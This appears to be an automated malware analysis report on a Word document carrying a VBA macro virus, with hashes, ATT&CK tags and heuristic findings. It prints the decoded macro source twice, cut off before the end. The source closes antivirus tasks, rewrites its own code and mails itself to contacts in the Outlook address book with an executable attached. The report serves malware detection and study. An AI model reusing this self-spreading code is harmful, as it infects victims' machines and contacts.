Office (OLE) malware analysis — malicious · 5291caa365d1eb19

MALICIOUS

Office (OLE)

58.0 KB Created: 2002-08-06 15:22:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 8113f2d48c91c7412b4c9d46fc51578b SHA-1: a38ee72fb8c91ce561df42f6b84f512a9e1d8c52 SHA-256: 5291caa365d1eb199e450ebb0cec1dda50b38fedb2744f2527ec1a1cae1080fc

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a malicious OLE document containing a VBA macro that executes upon opening. The macro attempts to write to the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\Cow and then proceeds to obfuscate code, likely to download and execute a secondary payload using Shell() and CreateObject calls. The obfuscated nature of the script and the use of Shell() indicate a downloader or dropper functionality.

Heuristics 7

VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://red.tripod.com In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8617 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8617 bytes
SHA-256: `71c858a7daa6370a3fe95fbf26f8852d129303a9bc3b22adfbb8dd6e7a14650d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() On Error Resume Next '‰LQ'w5‡ 'simulate "Cow" registry signature'pЌa'rxV If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\", "Cow") <> "Moooo" Then System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\", "Cow") = "Moooo" '=E End If 'wWk'O;Џ 'close any active AV tasks'8qE'tQ2 Set BLCMp = Tasks '3f‰'[7n For PLQMp = 1 To BLCMp.Count '“yY'^L‹ If InStr(1, BLCMp(PLQMp).Name, "av", vbTextCompare) Or InStr(1, BLCMp(PLQMp).Name, "AV", vbTextCompare) Then BLCMp(PLQMp).Close '[Ro'~ni End If '-uz'[FI Next PLQMp '#65'Ћm‚ 'poly starts here:'_T'9__ Set BLCMp = ActiveDocument.VBProject '‚_…'JG: Set BWJMp = BLCMp.VBComponents(1).CodeModule '\|…v'b:3 If ThisDocument.FullName <> Templates(1).FullName Then 's4'tS‡ BFGMp = 18 'RJ9'o3P ReDim CMSMp(1 To BFGMp) As String ',{u',q, CMSMp(1) = "BFGMp": CMSMp(2) = "OXJMp": CMSMp(3) = "CMSMp": CMSMp(4) = "IWTMp" 'A\|Q'~ej CMSMp(5) = "IVPMp": CMSMp(6) = "PLQMp": CMSMp(7) = "BLCMp": CMSMp(8) = "CVOMp" '(ZX'RtW CMSMp(9) = "HYHMp": CMSMp(10) = "CLCMp": CMSMp(11) = "LRLMp" ']G>'Bv0 CMSMp(12) = "WBIMp": CMSMp(13) = "MJOMp": CMSMp(14) = "AMCMp": CMSMp(15) = "CTIMp" 'Ђ‹G'O(Џ CMSMp(16) = "GONMp": CMSMp(17) = "BWJMp": CMSMp(18) = "NFWMp" '-“]'3sD 'modify vars.'[ _''Y‚ For PLQMp = 1 To BFGMp '2}g'ђL5 Randomize '\Pv'(Nl IVPMp = Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) + "Mp" '€a† For OXJMp = 2 To BWJMp.CountOfLines 'Ќ”\'z_w CVOMp = BWJMp.Lines(OXJMp, 1) ']g9'wK@ If InStr(1, CVOMp, CMSMp(PLQMp), vbTextCompare) Then '4bb'$YK CVOMp = Replace(CVOMp, CMSMp(PLQMp), IVPMp, 1, -1, vbTextCompare) 'BE?'Ѓ&v BWJMp.ReplaceLine OXJMp, CVOMp 'BЂЋ'$…( End If '9I.'ln/ Next OXJMp 'xz$''Ht Next PLQMp 'Q!p'y.q 'Add random chars, but not too many, don't wanna increase the size too much :)'>$`'Sa! For PLQMp = 2 To BWJMp.CountOfLines '7p''Ifѓ CVOMp = BWJMp.Lines(PLQMp, 1) '‰3'36W If Len(CVOMp) <= 100 Then '0ЋX'Dw} CVOMp = CVOMp + "'" + Chr(Int((120 Rnd) + 32)) + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32)) BWJMp.ReplaceLine PLQMp, CVOMp '+ak'.E! End If 'Ђ”a'>‘? Next PLQMp '%d ',QQ End If 'Ћg.'G}— 'Actual virus'€€a''Rk '-------------------------------------------------------------------'2G!'E N 'E-mail spread'‚\&'T$Q 'C:\installs.exe contains W32/Baboon'{•'T†D FileCopy "C:\os4321.sys", "C:\installs.exe" '‚‹_'E‹? WBIMp = Chr(79) + Chr(117) + Chr(116) + Chr(108) + Chr(111) + Chr(111) + Chr(107) 'znM'"e+ Set HYHMp = CreateObject(WBIMp + Chr(46) + Chr(65) + Chr(112) + Chr(112) + Chr(108) + Chr(105) + Chr(99) + Chr(97) + Chr(116) + Chr(105) + Chr(111) + Chr(110)) MJOMp = Chr(77) + Chr(65) + Chr(80) + Chr(73) 'Ma\'ЋX6 Set CLCMp = HYHMp.GetNameSpace(MJOMp) 'Uod'mL, Set WBIMp = CLCMp.AddressLists ',Њu'e‚& For PLQMp = 1 To WBIMp.Count 'J2{'oKF Set ABook = CLCMp.AddressLists(PLQMp) 'J p'8XO MJOMp = 1 '!Qk'6#! Set AMCMp = ABook.AddressEntries 'nxW'•!$ Set LRLMp = HYHMp.CreateItem(0) '%“R' VP For GONMp = 1 To AMCMp.Count '€xV'wO‰ CTIMp = AMCMp(MJOMp) '_#%'pW LRLMp.Recipients.Add CTIMp 'OIЌ'0Ѓh MJOMp = MJOMp + 1 'm)%'“-o If MJOMp > 20 Then BFGMp = AMCMp.Count 'Ђ=w'ЌqB Next GONMp '#G]'Q5k IVPMp = ActiveDocument.FullName 'lYx'S</ LRLMp.Subject = "hya" 'Ca9'trG LRLMp.Body = "some kewl stuff." 'L*D'bf} LRLMp.Attachments.Add IVPMp '{Zu'#th LRLMp.Attachments.Add "C:\installs.exe" 'zp;'eHЏ LRLMp.Send 'C†.'\|ѓd CTIMp = "" 'ЋS+'b24 Next PLQMp 'sbq'J%P 'Check if is already infected'.^f'S~P If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Red") <> "Red Guy" Then System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Red") = "Red Guy" '>kd 'No more security'‘‘^'l+Џ Options.SaveNormalPrompt = 5 Xor 5 ';?M'{W0 Comma ... (truncated)

SHA-256: 71c858a7daa6370a3fe95fbf26f8852d129303a9bc3b22adfbb8dd6e7a14650d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
On Error Resume Next '‰LQ'w5‡
'simulate "Cow" registry signature'pЌa'rxV
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\", "Cow") <> "Moooo" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\", "Cow") = "Moooo" '=E 
End If 'wWk'O;Џ
'close any active AV tasks'8qE'tQ2
Set BLCMp = Tasks '3f‰'[7n
For PLQMp = 1 To BLCMp.Count '“yY'^L‹
If InStr(1, BLCMp(PLQMp).Name, "av", vbTextCompare) Or InStr(1, BLCMp(PLQMp).Name, "AV", vbTextCompare) Then
BLCMp(PLQMp).Close '[Ro'~ni
End If '-uz'[FI
Next PLQMp '#65'Ћm‚
'poly starts here:'_T'9__
Set BLCMp = ActiveDocument.VBProject '‚_…'JG:
Set BWJMp = BLCMp.VBComponents(1).CodeModule '|…v'b:3
If ThisDocument.FullName <> Templates(1).FullName Then 's4'tS‡
BFGMp = 18 'RJ9'o3P
ReDim CMSMp(1 To BFGMp) As String ',{u',q,
CMSMp(1) = "BFGMp": CMSMp(2) = "OXJMp": CMSMp(3) = "CMSMp": CMSMp(4) = "IWTMp" 'A|Q'~ej
CMSMp(5) = "IVPMp": CMSMp(6) = "PLQMp": CMSMp(7) = "BLCMp": CMSMp(8) = "CVOMp" '(ZX'RtW
CMSMp(9) = "HYHMp": CMSMp(10) = "CLCMp": CMSMp(11) = "LRLMp" ']G>'Bv0
CMSMp(12) = "WBIMp": CMSMp(13) = "MJOMp": CMSMp(14) = "AMCMp": CMSMp(15) = "CTIMp" 'Ђ‹G'O(Џ
CMSMp(16) = "GONMp": CMSMp(17) = "BWJMp": CMSMp(18) = "NFWMp" '-“]'3sD
'modify vars.'[ _''Y‚
For PLQMp = 1 To BFGMp '2}g'ђL5
Randomize '\Pv'(Nl
IVPMp = Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) + "Mp" '€a†
For OXJMp = 2 To BWJMp.CountOfLines 'Ќ”\'z_w
CVOMp = BWJMp.Lines(OXJMp, 1) ']g9'wK@
If InStr(1, CVOMp, CMSMp(PLQMp), vbTextCompare) Then '4bb'$YK
CVOMp = Replace(CVOMp, CMSMp(PLQMp), IVPMp, 1, -1, vbTextCompare) 'BE?'Ѓ&v
BWJMp.ReplaceLine OXJMp, CVOMp 'BЂЋ'$…(
End If '9I.'ln/
Next OXJMp 'xz$''Ht
Next PLQMp 'Q!p'y.q
'Add random chars, but not too many, don't wanna increase the size too much :)'>$`'Sa!
For PLQMp = 2 To BWJMp.CountOfLines '7p''Ifѓ
CVOMp = BWJMp.Lines(PLQMp, 1) '‰3*'36W
If Len(CVOMp) <= 100 Then '0ЋX'Dw}
CVOMp = CVOMp + "'" + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32))
BWJMp.ReplaceLine PLQMp, CVOMp '+ak'.E!
End If 'Ђ”a'>‘?
Next PLQMp '%d ',QQ
End If 'Ћg.'G}—
'Actual virus'€€a''Rk
'-------------------------------------------------------------------'2G!'E N
'E-mail spread'‚\&'T$Q
'C:\installs.exe contains W32/Baboon'{•'T†D
FileCopy "C:\os4321.sys", "C:\installs.exe" '‚‹_'E‹?
WBIMp = Chr(79) + Chr(117) + Chr(116) + Chr(108) + Chr(111) + Chr(111) + Chr(107) 'znM'"e+
Set HYHMp = CreateObject(WBIMp + Chr(46) + Chr(65) + Chr(112) + Chr(112) + Chr(108) + Chr(105) + Chr(99) + Chr(97) + Chr(116) + Chr(105) + Chr(111) + Chr(110))
MJOMp = Chr(77) + Chr(65) + Chr(80) + Chr(73) 'Ma\'ЋX6
Set CLCMp = HYHMp.GetNameSpace(MJOMp) 'Uod'mL,
Set WBIMp = CLCMp.AddressLists ',Њu'e‚&
For PLQMp = 1 To WBIMp.Count 'J2{'oKF
Set ABook = CLCMp.AddressLists(PLQMp) 'J p'8XO
MJOMp = 1 '!Qk'6#!
Set AMCMp = ABook.AddressEntries 'nxW'•!$
Set LRLMp = HYHMp.CreateItem(0) '%“R' VP
For GONMp = 1 To AMCMp.Count '€xV'wO‰
CTIMp = AMCMp(MJOMp) '_#%'pW 
LRLMp.Recipients.Add CTIMp 'OIЌ'0Ѓh
MJOMp = MJOMp + 1 'm)%'“-o
If MJOMp > 20 Then BFGMp = AMCMp.Count 'Ђ=w'ЌqB
Next GONMp '#G]'Q5k
IVPMp = ActiveDocument.FullName 'lYx'S</
LRLMp.Subject = "hya" 'Ca9'trG
LRLMp.Body = "some kewl stuff." 'L*D'bf}
LRLMp.Attachments.Add IVPMp '{Zu'#th
LRLMp.Attachments.Add "C:\installs.exe" 'zp;'eHЏ
LRLMp.Send 'C†.'|ѓd
CTIMp = "" 'ЋS+'b24
Next PLQMp 'sbq'J%P
'Check if is already infected'.^f'S~P
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Red") <> "Red Guy" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Red") = "Red Guy" '>kd
'No more security'‘‘^'l+Џ
Options.SaveNormalPrompt = 5 Xor 5 ';?M'{W0
Comma
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.